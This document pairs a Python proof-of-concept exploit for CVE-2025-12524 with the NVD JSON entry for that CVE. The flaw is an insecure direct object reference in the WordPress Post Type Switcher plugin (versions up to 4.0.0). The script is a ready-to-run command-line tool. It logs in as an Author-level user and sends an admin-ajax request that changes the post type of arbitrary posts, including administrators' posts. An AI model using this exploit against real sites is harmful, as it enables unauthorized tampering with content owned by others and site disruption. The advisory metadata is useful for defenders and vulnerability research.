CVE-2025-12524

import requests import sys # CVE-2025-12524 PoC - Post Type Switcher IDOR Vulnerability # Target: WordPress site with Post Type Switcher plugin <= 4.0.0 def exploit_post_type_switcher(target_url, username, password, target_post_id, new_post_type): """ Exploit IDOR vulnerability in Post Type Switcher plugin Args: target_url: Base URL of WordPress site username: WordPress username (Author level or higher) password: WordPress password target_post_id: ID of post to modify (can be any post, even admin's) new_post_type: Target post type (e.g., 'page', 'attachment') """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Exploit IDOR - Change post type of arbitrary post admin_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'pts_switch_post_type', 'post_id': target_post_id, # IDOR: No ownership check 'new_post_type': new_post_type # Attacker controlled } response = session.post(admin_url, data=exploit_data) if response.status_code == 200: print(f"[+] Post {target_post_id} type changed to {new_post_type}") return True else: print("[-] Exploitation failed") return False if __name__ == "__main__": if len(sys.argv) < 6: print("Usage: python cve-2025-12524.py <target_url> <username> <password> <post_id> <new_type>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] post_id = sys.argv[4] new_type = sys.argv[5] exploit_post_type_switcher(target, user, pwd, post_id, new_type)

{"cve": {"id": "CVE-2025-12524", "sourceIdentifier": "[email protected]", "published": "2025-11-18T07:15:44.237", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Post Type Switcher plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 4.0.0 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to modify the post type of arbitrary posts and pages they do not own, including those created by administrators, which can lead to site disruption, broken navigation, and SEO impact."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://cwe.mitre.org/data/definitions/639.html", "source": "[email protected]"}, {"url": "https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/post-type-switcher/tags/4.0.0/post-type-switcher.php#L469", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/post-type-switcher/tags/4.0.0/post-type-switcher.php#L486", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3391983%40post-type-switcher%2Ftrunk&old=3331072%40post-type-switcher%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d875514c-c7d3-4236-842b-6e772048448d?source=cve", "source": "[email protected]"}]}}